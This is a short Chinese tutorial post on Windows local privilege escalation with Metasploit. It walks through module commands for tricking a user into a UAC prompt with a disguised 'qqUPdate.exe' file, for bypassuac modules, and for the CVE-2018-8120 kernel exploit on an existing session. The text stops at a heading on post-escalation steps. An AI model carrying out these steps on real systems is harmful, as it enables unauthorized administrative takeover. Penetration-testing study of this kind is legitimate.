内网渗透 day5-msf本地提权(windows)
阅读原文时间:2022年04月05日阅读:1
msf本地提权

目录

1. 利用uac提权 1

2. 绕过uac认证 2

3. 利用windows本地提权漏洞进行提权 4

1. 利用uac提权

前提与目标机建立会话连接

seach local/ask     搜索关键字local/ask

use 0      进入到exploit/windows/local/ask模块下

show options 查看相关参数

set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以)

set session 1     设置会话窗口(先查看一下会话的id)

run执行

目标机弹出弹窗

点击是后,成功进入meterpreter命令行

这时候getsystem就可以成功提权

2. 绕过uac认证

search bypassuac     搜索bypassuac关键字(显示有13个提取脚本,一个不行就换一个)

use 3     进入编号为3的提权脚本模块

show opthions 查看相关参数

查看会话并且设置会话

show targets 显示可选平台

set target 0       设置为X86

run 执行

提权成功

3. 利用windows本地提权漏洞进行提权

cve-2018-8120

search cve-2018-8120   查找关键字

use 0 进入该模块

show options 查看相关参数

session 查看会话

设置为没有权限的会话3

进入后直接获得管理员权限

cve-2020-0796

同上

由于我win10更新过有补丁了

cve-2020-0787

提权后操作